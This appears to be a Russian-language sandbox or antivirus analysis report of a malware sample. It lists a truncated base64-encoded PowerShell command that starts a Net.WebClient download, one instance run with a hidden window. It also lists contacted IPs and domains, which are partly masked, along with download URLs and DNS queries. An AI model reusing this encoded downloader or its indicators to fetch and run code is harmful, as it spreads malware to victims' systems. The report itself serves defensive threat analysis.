Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABuAF8AXwAzADEAOQA9ACgAJwBFADIAJwArACcAMAA4ADUANgAnACkAOwAkAG8ANgA2ADAANQAyADcANAA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABDAF8AOABfADQAOAA4ADUAPQAoACcAaAB0AH...
- '22#.#4.214.122':80
- '79.##7.86.189':80
- 'dm###oup.com.vn':80
- 'dm###oup.com.vn':443
- 'el##joy.com':80
- http://dm###oup.com.vn/k0jINCbJj2n8TL9
- http://el##joy.com/G4AFioRkP1t_oJSEWMw
- 'dm###oup.com.vn':443
- DNS ASK dm###oup.com.vn
- DNS ASK en###sh-run.com
- DNS ASK el##joy.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABuAF8AXwAzADEAOQA9ACgAJwBFADIAJwArACcAMAA4ADUANgAnACkAOwAkAG8ANgA2ADAANQAyADcANAA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABDAF8AOABfADQAOAA4ADUAPQAoACcAaAB0AH...' (со скрытым окном)